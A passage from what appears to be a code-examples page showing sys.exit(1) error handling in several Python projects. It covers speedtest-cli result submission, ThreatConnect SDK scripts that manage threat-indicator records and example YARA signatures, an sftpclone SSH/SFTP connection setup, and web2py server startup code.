            'hash=%s' % md5(('%s-%s-%s-%s' %
                             (ping, ulspeedk, dlspeedk, '297aae72'))
                            .encode()).hexdigest()]

        headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
        request = build_request('://www.speedtest.net/api/api.php',
                                data='&'.join(apiData).encode(),
                                headers=headers)
        f, e = catch_request(request)
        if e:
            print_('Could not submit results to speedtest.net: %s' % e)
            sys.exit(1)
        response = f.read()
        code = f.code
        f.close()

        if int(code) != 200:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        qsargs = parse_qs(response.decode())
        resultid = qsargs.get('resultid')
        if not resultid or len(resultid) != 1:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        print_('Share results: %s://www.speedtest.net/result/%s.png' %
               (scheme, resultid[0]))
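
Most failure paths above print a short message and then call sys.exit(1), while the --list path exits with 0 after printing the server list. A small hypothetical helper capturing that convention:

import sys

def finish(message, ok=True):
    # Print a final message and exit: status 0 for a normal finish,
    # status 1 for an error the user should act on.
    print(message)
    sys.exit(0 if ok else 1)

# finish('Cannot retrieve speedtest configuration', ok=False)  # would exit with status 1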

Example 12

View license
def main():
    """ """
    # (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
    tc.set_tcl_file('log/tc.log', 'debug')
    tc.set_tcl_console_level('critical')

    # (Required) Instantiate a Resource Object
    resources = tc.emails()

    #
    # (Optional) retrieve results from API and update selected resource in loop
    #

    # filters can be set to limit search results
    try:
        filter1 = resources.add_filter()
        filter1.add_owner(owner)  # filter on owner
    except AttributeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    try:
        resources.retrieve()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    for res in resources:

        # a particular resource can be matched by ID, Name or any other supported attribute
        if res.id == lu_id:
            #
            # once a resource is matched any metadata on that resource can be updated
            #
            res.set_name('LU Email #{0:d}'.format(rn))
            res.set_body('This is an email body #{0:d}.'.format(rn))
            res.set_header('This is an email header #{0:d}.'.format(rn))
            res.set_subject('This is an email subject #{0:d}.'.format(rn))
            res.set_from_address('adversary_{0:d}@badguys.com'.format(rn))
            res.set_to('victim_{0:d}@goodguys.com'.format(rn))

            #
            # working with indicator associations
            #

            # existing indicator associations can be retrieved and iterated through
            for association in res.indicator_associations:
                # add delete flag to all indicator association that have a confidence under 10
                if association.confidence < 10:
                    res.disassociate_indicator(association.resource_type, association.indicator)

            # indicator associations can be added to a resource by providing the resource type and value
            res.associate_indicator(ResourceType.ADDRESSES, ip_address)

            #
            # working with group associations
            #

            # existing group associations can be retrieved and iterated through
            for association in res.group_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_group(association.resource_type, association.id)

            # group associations can be added to a resource by providing the resource type and id
            res.associate_group(ResourceType.ADVERSARIES, adversary_id)

            #
            # working with victim associations
            #

            # existing victim associations can be retrieved and iterated through
            for association in res.victim_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_victim(association.id)

            # victim associations can be added to a resource by providing the resource id
            res.associate_victim(victim_id)

            #
            # working with attributes
            #

            # existing attributes can be loaded into the resource and iterated through
            res.load_attributes()
            for attribute in res.attributes:
                # add delete flag to all attributes that have 'test' in the value.
                if re.findall('test', attribute.value):
                    res.delete_attribute(attribute.id)
                # add update flag to all attributes that have 'update' in the value.
                if re.findall('update', attribute.value):
                    res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))

            # attributes can be added to a resource by providing the attribute type and value
            res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))

            #
            # working with tags
            #

            # existing tags can be loaded into the resource and iterated through
            res.load_tags()
            for tag in res.tags:
                # add delete flag to all tags that have 'DELETE' in the name.
                if re.findall('DELETE', tag.name):
                    res.delete_tag(tag.name)

            # tags can be added to a resource by providing the tags value
            res.add_tag('DELETE #{0:d}'.format(rn))

            # (Required) commit this resource
            try:
                print('Updating resource {0!s}.'.format(res.name))
                res.commit()
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

        #
        # (Optional) delete resource if required
        #

        # delete to any resource that has 'DELETE' in the name.
        elif re.findall('DELETE', res.name):
            try:
                print('Deleting resource {0!s}.'.format(res.name))
                res.delete()  # this action is equivalent to commit
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

    #
    # (Optional) ADD RESOURCE EXAMPLE
    #

    # new resources can be added with the resource add method
    resource = resources.add('DELETE #{0:d}'.format(rn), owner)

    # additional properties can be added
    resource.set_body('This is an email body #{0:d}.'.format(rn))
    resource.set_from_address('bad_guy_{0:d}@badguys.com'.format(rn))
    resource.set_header('This is an email header #{0:d}.'.format(rn))
    resource.set_subject('This is an email subject #{0:d}.'.format(rn))
    resource.set_to('victim{0:d}@goodguys.com'.format(rn))

    # attributes can be added to the new resource
    resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))

    # tags can be added to the new resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # the security label can be set on the new resource
    resource.set_security_label('TLP Green')

    # commit this resource and add attributes, tags and security labels
    try:
        print('Adding resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) UPDATE RESOURCE EXAMPLE
    #

    # existing resources can also be updated with the resource add method
    resource = resources.add('MU Email #{0:d}'.format(rn), owner)  # this will overwrite exising resource name
    resource.set_id(mu_id)  # set the id to the existing resource

    # additional properties can be updated
    resource.set_body('This is an updated email body #{0:d}.'.format(rn))
    resource.set_from_address('bad_guy_update{0:d}@badguys.com'.format(rn))
    resource.set_header('This is an updated email header #{0:d}.'.format(rn))
    resource.set_subject('This is an updated email subject #{0:d}.'.format(rn))
    resource.set_to('victim_update{0:d}@goodguys.com'.format(rn))

    # existing attributes can be loaded for modification or deletion
    resource.load_attributes()
    for attribute in resource.attributes:
        if attribute.type == 'Description':
            resource.delete_attribute(attribute.id)

    # attributes can be added to the existing resource
    resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))

    # existing tags can be loaded for modification or deletion
    resource.load_tags()
    for tag in resource.tags:
        resource.delete_tag(tag.name)

    # tags can be added to the existing resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # commit this resource and add attributes, tags and security labels
    try:
        print('Updating resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) DELETE RESOURCE EXAMPLE
    #

    # resources can be deleted with the resource add method
    # resource = resources.add(''.format(rn), owner)  # a valid resource name is not required
    # resource.set_id(dl_id)
    #
    # # delete this resource
    # try:
    #     resource.delete()
    # except RuntimeError as e:
    #     print(e)

    # (Optional) DISPLAY A COMMIT REPORT
    print(tc.report.stats)

    # display any failed api calls
    for fail in tc.report.failures:
        print(fail)
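
Every commit in the example above is wrapped in the same try/except RuntimeError/sys.exit(1) block. A hypothetical helper (not part of the threatconnect SDK) that factors the pattern out could look like this:

import sys

def commit_or_exit(resource):
    # Commit a resource; if the API raises RuntimeError, report it and
    # abort the script with a non-zero status, as the example does inline.
    try:
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)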

Example 13

View license
def main():
    """ """
    # set threat connect log (tcl) level
    tc.set_tcl_file('log/tc.log', 'debug')
    tc.set_tcl_console_level('critical')
    tc.report_enable()

    # (Required) Instantiate a Resource Object
    resources = tc.indicators()

    # (Optional) Filters can be added here if required to narrow the result set.
    try:
        filter1 = resources.add_filter()
        filter1.add_owner(owner)
    except AttributeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    # (Optional) retrieve all results
    try:
        resources.retrieve()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    # (Optional) iterate through all results if retrieve was used above
    for res in resources:

        # (Optional) match a particular resource by ID, Name or any other supported attribute.
        if lu_indicator == res.indicator or lu_indicator in res.indicator:
            #
            # update resource if required
            #
            res.set_confidence(rn)
            res.set_rating(randint(0, 5))
            res.set_description('Test Description {0:d}'.format(randint(0, 5)))
            res.delete_security_label('TLP Red')
            res.set_security_label('TLP Red')

            #
            # working with indicator associations
            #

            # indicator to indicator associations can be retrieved, but NOT directly associated,

            #
            # working with group associations
            #

            # (Optional) get all group associations
            for association in res.group_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('Loop', association.name):
                    res.disassociate_group(association.resource_type, association.id)

            res.associate_group(ResourceType.ADVERSARIES, adversary_id)

            #
            # working with victim associations
            #

            # (Optional) get all victim associations
            # resources.victim_associations(res)
            # for association in res.association_objects_victims:
            #     print(association)

            #
            # working with attributes
            #
            # (Optional) get all attributes associated with this resource
            res.load_attributes()
            for attribute in res.attributes:
                # add delete flag to all attributes that have 'test' in the value.
                if re.findall('DELETE', attribute.value):
                    res.delete_attribute(attribute.id)
                # add update flag to all attributes that have 'update' in the value.
                if attribute.type == 'Source' and re.findall('UPDATE', attribute.value):
                    res.update_attribute(attribute.id, 'UPDATE Test Attribute %s' % rn)
            # (Optional) add attribute to resource with type and value
            res.add_attribute('Additional Analysis and Context', 'DELETE Test Attribute %s' % rn)

            #
            # working with tags
            #

            # (Optional) get all tags associated with this resource
            res.load_tags()
            for tag in res.tags:
                # add delete flag to all tags that have 'DELETE' in the name.
                if re.findall('DELETE', tag.name):
                    res.delete_tag(tag.name)
            # (Optional) add tag to resource
            res.add_tag('DELETE {0:d}'.format(rn))
            res.add_tag('EXAMPLE')

            # commit changes
            try:
                print('Updating resource {0!s}.'.format(res.indicator))
                res.commit()
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

        #
        # delete resource
        #

        # (Optional) add delete flag to previously created indicators
        if isinstance(res.indicator, dict):
            for k, v in res.indicator.items():
                if v is not None and re.findall(prefixes['file'], v):
                    print('Delete resource {0!s}.'.format(res.indicator))
                    res.delete()
                    break
        else:
            for k, v in prefixes.items():
                if re.findall(v, res.indicator):
                    print('Delete resource {0!s}.'.format(res.indicator))
                    res.delete()
                    break

    #
    # add address indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('4.3.254.{0:d}'.format(rn), owner)
    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add email address indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}_{1!s}@badguysareus.com'.format(prefixes['email'], str(rn).zfill(3)), owner)
    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add file indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}1ba81f1dc6d3637589ffa04366{1!s}'.format(
        prefixes['file'], str(rn).zfill(3)), owner)
    resource.set_indicator('{0!s}530f8e0104d4521958309eb9852e073150{1!s}'.format(
        prefixes['file'], str(rn).zfill(3)))
    resource.set_indicator('{0!s}10a665da94445f5b505c828d532886541900373d29042cc46c3300a186{1!s}'.format(
        prefixes['file'], str(rn).zfill(3)))

    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))
    resource.set_size(rn)
    fo_date = (datetime.isoformat(datetime(2015, randint(1, 12), randint(1, 29)))) + 'Z'
    resource.add_file_occurrence('badfile_{0!s}.exe'.format(rn), 'C:\windows', fo_date)

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add host indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}_{1!s}.com'.format(prefixes['host'], str(rn).zfill(3)), owner)

    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    # (Optional) set resource as false positive
    resource.add_false_positive()

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add url indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}_{1!s}.com/clickme.html'.format(
        prefixes['url'], str(rn).zfill(3)), owner)

    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    # (Optional) display a commit report of all API actions performed
    print(tc.report.stats)

    # display any failed api calls
    for fail in tc.report.failures:
        print(fail)
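
The same report-and-exit handling also recurs around add_filter and retrieve. An alternative sketch is a decorator that turns a RuntimeError raised by any wrapped step into an exit with status 1 (again an illustration, not an SDK feature):

import functools
import sys

def exit_on_runtime_error(step):
    # Wrap a callable so a RuntimeError aborts the script with status 1
    # instead of propagating, matching the inline try/except blocks above.
    @functools.wraps(step)
    def wrapper(*args, **kwargs):
        try:
            return step(*args, **kwargs)
        except RuntimeError as e:
            print('Error: {0!s}'.format(e))
            sys.exit(1)
    return wrapper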

Example 14

View license
def main():
    """ """
    # (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
    tc.set_tcl_file('log/tc.log', 'debug')
    tc.set_tcl_console_level('critical')

    # (Required) Instantiate a Resource Object
    resources = tc.signatures()

    #
    # (Optional) retrieve results from API and update selected resource in loop
    #

    # filters can be set to limit search results
    try:
        filter1 = resources.add_filter()
        filter1.add_owner(owner)  # filter on owner
    except AttributeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    try:
        resources.retrieve()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    for res in resources:

        # a particular resource can be matched by ID, Name or any other supported attribute
        if res.id == lu_id:
            #
            # once a resource is matched any metadata on that resource can be updated
            #
            res.set_name('LU Signature #{0:d}'.format(rn))

            # existing field can be updated
            res.set_file_name('loop update {0:d}.yara'.format(rn))
            res.set_file_type('YARA')
            file_text = '"' + str(rn) + ' rule example_sig : example\n{\n'
            file_text += 'meta:\n        description = "This '
            file_text += 'is just an example"\n\n '
            file_text += 'strings:\n        $a = {6A 40 68 00 '
            file_text += '30 00 00 6A 14 8D 91}\n        $b = '
            file_text += '{8D 4D B0 2B C1 83 C0 27 99 6A 4E '
            file_text += '59 F7 F9}\n    condition:\n '
            file_text += '$a or $b or $c\n}"'
            res.set_file_text(file_text)

            #
            # working with indicator associations
            #

            # existing indicator associations can be retrieved and iterated through
            for association in res.indicator_associations:
                # add delete flag to all indicator association that have a confidence under 10
                if association.confidence < 10:
                    res.disassociate_indicator(association.resource_type, association.indicator)

            # indicator associations can be added to a resource by providing the resource type and value
            res.associate_indicator(ResourceType.ADDRESSES, ip_address)

            #
            # working with group associations
            #

            # existing group associations can be retrieved and iterated through
            for association in res.group_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_group(association.resource_type, association.id)

            # group associations can be added to a resource by providing the resource type and id
            res.associate_group(ResourceType.ADVERSARIES, adversary_id)

            #
            # working with victim associations
            #

            # existing victim associations can be retrieved and iterated through
            for association in res.victim_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_victim(association.id)

            # victim associations can be added to a resource by providing the resource id
            res.associate_victim(victim_id)

            #
            # working with attributes
            #

            # existing attributes can be loaded into the resource and iterated through
            res.load_attributes()
            for attribute in res.attributes:
                # add delete flag to all attributes that have 'test' in the value.
                if re.findall('test', attribute.value):
                    res.delete_attribute(attribute.id)
                # add update flag to all attributes that have 'update' in the value.
                if re.findall('update', attribute.value):
                    res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))

            # attributes can be added to a resource by providing the attribute type and value
            res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))

            #
            # working with tags
            #

            # existing tags can be loaded into the resource and iterated through
            res.load_tags()
            for tag in res.tags:
                # add delete flag to all tags that have 'DELETE' in the name.
                if re.findall('DELETE', tag.name):
                    res.delete_tag(tag.name)

            # tags can be added to a resource by providing the tags value
            res.add_tag('DELETE #{0:d}'.format(rn))

            # (Required) commit this resource
            try:
                print('Updating resource {0!s}.'.format(res.name))
                res.commit()
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

        #
        # (Optional) delete resource if required
        #

        # delete to any resource that has 'DELETE' in the name.
        elif re.findall('DELETE', res.name):
            try:
                print('Deleting resource {0!s}.'.format(res.name))
                res.delete()  # this action is equivalent to commit
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

    #
    # (Optional) ADD RESOURCE EXAMPLE
    #

    # new resources can be added with the resource add method
    resource = resources.add('DELETE #{0:d}'.format(rn), owner)

    # add REQUIRED and optional fields for new resource
    resource.set_file_name('delete {0:d}.txt'.format(rn))
    resource.set_file_type('YARA')
    file_text = '"' + str(rn) + ' rule example_sig : example\n{\n'
    file_text += 'meta:\n        description = "This '
    file_text += 'is just an example"\n\n '
    file_text += 'strings:\n        $a = {6A 40 68 00 '
    file_text += '30 00 00 6A 14 8D 91}\n        $b = '
    file_text += '{8D 4D B0 2B C1 83 C0 27 99 6A 4E '
    file_text += '59 F7 F9}\n    condition:\n '
    file_text += '$a or $b or $c\n}"'
    resource.set_file_text(file_text)

    # attributes can be added to the new resource
    resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))

    # tags can be added to the new resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # the security label can be set on the new resource
    resource.set_security_label('TLP Green')

    # commit this resource and add attributes, tags and security labels
    try:
        print('Adding resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) UPDATE RESOURCE EXAMPLE
    #

    # existing resources can also be updated with the resource add method
    resource = resources.add('MU Signature #{0:d}'.format(rn), owner)  # this will overwrite exising resource name
    resource.set_id(mu_id)  # set the id to the existing resource

    # existing properties can be updated
    resource.set_file_name('manual update {0:d}.txt'.format(rn))
    resource.set_file_type('YARA')
    file_text = '"' + str(rn) + ' rule example_sig : example\n{\n'
    file_text += 'meta:\n        description = "This '
    file_text += 'is just an example"\n\n '
    file_text += 'strings:\n        $a = {6A 40 68 00 '
    file_text += '30 00 00 6A 14 8D 91}\n        $b = '
    file_text += '{8D 4D B0 2B C1 83 C0 27 99 6A 4E '
    file_text += '59 F7 F9}\n    condition:\n '
    file_text += '$a or $b or $c\n}"'
    resource.set_file_text(file_text)

    # existing attributes can be loaded for modification or deletion
    resource.load_attributes()
    for attribute in resource.attributes:
        if attribute.type == 'Description':
            resource.delete_attribute(attribute.id)

    # attributes can be added to the existing resource
    resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))

    # existing tags can be loaded for modification or deletion
    resource.load_tags()
    for tag in resource.tags:
        resource.delete_tag(tag.name)

    # tags can be added to the existing resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # commit this resource and add attributes, tags and security labels
    try:
        print('Updating resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) DELETE RESOURCE EXAMPLE
    #

    # resources can be deleted with the resource add method
    # resource = resources.add(''.format(rn), owner)  # a valid resource name is not required
    # resource.set_id(dl_id)
    #
    # # delete this resource
    # try:
    #     resource.delete()
    # except RuntimeError as e:
    #     print(e)

    # (Optional) DISPLAY A COMMIT REPORT
    print(tc.report.stats)

    # display any failed api calls
    for fail in tc.report.failures:
        print(fail)
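
Rather than exiting on the first failed call, the script ends by printing tc.report.stats and iterating over tc.report.failures. A short sketch of turning such a report into the process exit status (the failures argument is assumed to be any iterable of failure records):

import sys

def exit_from_report(failures):
    # Print each recorded API failure and exit non-zero only if there were any,
    # so a clean run still returns status 0 to the calling shell.
    failures = list(failures)
    for fail in failures:
        print(fail)
    sys.exit(1 if failures else 0)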

Example 15

Project: sftpclone
Source File: sftpclone.py
View license
    def __init__(self, local_path, remote_url,
                 identity_files=None, port=None, fix_symlinks=False,
                 ssh_config_path=None, ssh_agent=False,
                 exclude_file=None, known_hosts_path=None,
                 delete=True, allow_unknown=False
                 ):
        """Init the needed parameters and the SFTPClient."""
        self.local_path = os.path.realpath(os.path.expanduser(local_path))
        self.logger = logger or configure_logging()

        if not os.path.exists(self.local_path):
            self.logger.error("Local path MUST exist. Exiting.")
            sys.exit(1)

        if exclude_file:
            with open(exclude_file) as f:
                # As in rsync's exclude from, ignore lines with leading ; and #
                # and treat each path as relative (thus by removing the leading
                # /)
                exclude_list = [
                    line.rstrip().lstrip("/")
                    for line in f
                    if not line.startswith((";", "#"))
                ]

                # actually, is a set of excluded files
                self.exclude_list = {
                    g
                    for pattern in exclude_list
                    for g in glob.glob(path_join(self.local_path, pattern))
                }
        else:
            self.exclude_list = set()

        username, password, hostname, self.remote_path = parse_username_password_hostname(remote_url)

        identity_files = identity_files or []
        if ssh_config_path:
            try:
                with open(os.path.expanduser(ssh_config_path)) as c_file:
                    ssh_config = paramiko.SSHConfig()
                    ssh_config.parse(c_file)
                    c = ssh_config.lookup(hostname)

                    hostname = c.get("hostname", hostname)
                    username = c.get("user", username)
                    port = int(c.get("port", port))
                    identity_files = c.get("identityfile", identity_files)
            except Exception as e:
                # it could be safe to continue anyway,
                # because parameters could have been manually specified
                self.logger.error(
                    "Error while parsing ssh_config file: %s. Trying to continue anyway...", e
                )

        # Set default values
        if not username:
            username = getuser()  # defaults to current user

        port = port or 22
        allow_unknown = allow_unknown or False

        self.chown = False
        self.fix_symlinks = fix_symlinks or False
        self.delete = delete if delete is not None else True

        agent_keys = list()
        agent = None

        if ssh_agent:
            try:
                agent = paramiko.agent.Agent()
                _agent_keys = agent.get_keys()

                if not _agent_keys:
                    agent.close()
                    self.logger.error(
                        "SSH agent didn't provide any valid key. Trying to continue..."
                    )
                else:
                    agent_keys.extend(_agent_keys)

            except paramiko.SSHException:
                if agent:
                    agent.close()
                self.logger.error(
                    "SSH agent speaks a non-compatible protocol. Ignoring it.")

        if not identity_files and not password and not agent_keys:
            self.logger.error(
                "You need to specify either a password, an identity or to enable the ssh-agent support."
            )
            sys.exit(1)

        # only root can change file owner
        if username == 'root':
            self.chown = True

        try:
            transport = paramiko.Transport((hostname, port))
        except socket.gaierror:
            self.logger.error(
                "Hostname not known. Are you sure you inserted it correctly?")
            sys.exit(1)

        try:
            ssh_host = hostname if port == 22 else "[{}]:{}".format(hostname, port)
            known_hosts = None

            """
            Before starting the transport session, we have to configure it.
            Specifically, we need to configure the preferred PK algorithm.
            If the system already knows a public key of a specific kind for
            a remote host, we have to peek its type as the preferred one.
            """
            if known_hosts_path:
                known_hosts = paramiko.HostKeys()
                known_hosts_path = os.path.realpath(
                    os.path.expanduser(known_hosts_path))

                try:
                    known_hosts.load(known_hosts_path)
                except IOError:
                    self.logger.error(
                        "Error while loading known hosts file at {}. Exiting...".format(
                            known_hosts_path)
                    )
                    sys.exit(1)

                known_keys = known_hosts.lookup(ssh_host)
                if known_keys is not None:
                    # one or more keys are already known
                    # set their type as preferred
                    transport.get_security_options().key_types = \
                        tuple(known_keys.keys())

            transport.start_client()

            if not known_hosts:
                self.logger.warning("Security warning: skipping known hosts check...")
            else:
                pubk = transport.get_remote_server_key()
                if ssh_host in known_hosts.keys():
                    if not known_hosts.check(ssh_host, pubk):
                        self.logger.error(
                            "Security warning: "
                            "remote key fingerprint {} for hostname "
                            "{} didn't match the one in known_hosts {}. "
                            "Exiting...".format(
                                pubk.get_base64(),
                                ssh_host,
                                known_hosts.lookup(hostname),
                            )
                        )
                        sys.exit(1)
                elif not allow_unknown:
                    prompt = ("The authenticity of host '{}' can't be established.\n"
                              "{} key is {}.\n"
                              "Are you sure you want to continue connecting? [y/n] ").format(
                        ssh_host, pubk.get_name(), pubk.get_base64())

                    try:
                        # Renamed to `input` in Python 3.x
                        response = raw_input(prompt)
                    except NameError:
                        response = input(prompt)

                    # Note: we do not modify the user's known_hosts file

                    if not (response == "y" or response == "yes"):
                        self.logger.error(
                            "Host authentication failed."
                        )
                        sys.exit(1)

            def perform_key_auth(pkey):
                try:
                    transport.auth_publickey(
                        username=username,
                        key=pkey
                    )
                    return True
                except paramiko.SSHException:
                    self.logger.warning(
                        "Authentication with identity {}... failed".format(pkey.get_base64()[:10])
                    )
                    return False

            if password:  # Password auth, if specified.
                transport.auth_password(
                    username=username,
                    password=password
                )
            elif agent_keys:  # SSH agent keys have higher priority
                for pkey in agent_keys:
                    if perform_key_auth(pkey):
                        break  # Authentication worked.
                else:  # None of the keys worked.
                    raise paramiko.SSHException
            elif identity_files:  # Then follow identity file (specified from CL or ssh_config)
                # Try identity files one by one, until one works
                for key_path in identity_files:
                    key_path = os.path.expanduser(key_path)

                    try:
                        key = paramiko.RSAKey.from_private_key_file(key_path)
                    except paramiko.PasswordRequiredException:
                        pk_password = getpass(
                            "It seems that your identity from '{}' is encrypted. "
                            "Please enter your password: ".format(key_path)
                        )

                        try:
                            key = paramiko.RSAKey.from_private_key_file(key_path, pk_password)
                        except paramiko.SSHException:
                            self.logger.error(
                                "Incorrect passphrase. Cannot decode private key from '{}'.".format(key_path)
                            )
                            continue
                    except (IOError, paramiko.SSHException):
                        self.logger.error(
                            "Something went wrong while opening '{}'. Skipping it.".format(key_path)
                        )
                        continue

                    if perform_key_auth(key):
                        break  # Authentication worked.

                else:  # None of the keys worked.
                    raise paramiko.SSHException
            else:  # No authentication method specified, we shouldn't arrive here.
                assert False
        except paramiko.SSHException:
            self.logger.error(
                "None of the provided authentication methods worked. Exiting."
            )
            transport.close()
            sys.exit(1)
        finally:
            if agent:
                agent.close()

        self.sftp = paramiko.SFTPClient.from_transport(transport)

        if self.remote_path.startswith("~"):
            # nasty hack to let getcwd work without changing dir!
            self.sftp.chdir('.')
            self.remote_path = self.remote_path.replace(
                "~", self.sftp.getcwd())  # home is the initial sftp dir

Example 16

Project: termite-data-server
Source File: widget.py
View license
def start(cron=True):
    """ Start server  """

    # ## get command line arguments

    (options, args) = console()

    if not options.nobanner:
        print ProgramName
        print ProgramAuthor
        print ProgramVersion

    from dal import DRIVERS
    if not options.nobanner:
        print 'Database drivers available: %s' % ', '.join(DRIVERS)

    # ## if -L load options from options.config file
    if options.config:
        try:
            options2 = __import__(options.config, {}, {}, '')
        except Exception:
            try:
                # Jython doesn't like the extra stuff
                options2 = __import__(options.config)
            except Exception:
                print 'Cannot import config file [%s]' % options.config
                sys.exit(1)
        for key in dir(options2):
            if hasattr(options, key):
                setattr(options, key, getattr(options2, key))

    logfile0 = os.path.join('extras','examples','logging.example.conf')
    if not os.path.exists('logging.conf') and os.path.exists(logfile0):
        import shutil
        sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
        shutil.copyfile(logfile0, 'logging.conf')
        sys.stdout.write("OK\n")

    # ## if -T run doctests (no cron)
    if hasattr(options, 'test') and options.test:
        test(options.test, verbose=options.verbose)
        return

    # ## if -S start interactive shell (also no cron)
    if options.shell:
        if not options.args is None:
            sys.argv[:] = options.args
        run(options.shell, plain=options.plain, bpython=options.bpython,
            import_models=options.import_models, startfile=options.run,
            cronjob=options.cronjob)
        return

    # ## if -C start cron run (extcron) and exit
    # ##    -K specifies optional apps list (overloading scheduler)
    if options.extcron:
        logger.debug('Starting extcron...')
        global_settings.web2py_crontype = 'external'
        if options.scheduler:   # -K
            apps = [app.strip() for app in options.scheduler.split(
                ',') if check_existent_app(options, app.strip())]
        else:
            apps = None
        extcron = newcron.extcron(options.folder, apps=apps)
        extcron.start()
        extcron.join()
        return

    # ## if -K
    if options.scheduler and not options.with_scheduler:
        try:
            start_schedulers(options)
        except KeyboardInterrupt:
            pass
        return

    # ## if -H cron is enabled in this *process*
    # ## if --softcron use softcron
    # ## use hardcron in all other cases
    if cron and options.runcron and options.softcron:
        print 'Using softcron (but this is not very efficient)'
        global_settings.web2py_crontype = 'soft'
    elif cron and options.runcron:
        logger.debug('Starting hardcron...')
        global_settings.web2py_crontype = 'hard'
        newcron.hardcron(options.folder).start()

    # ## if no password provided and havetk start Tk interface
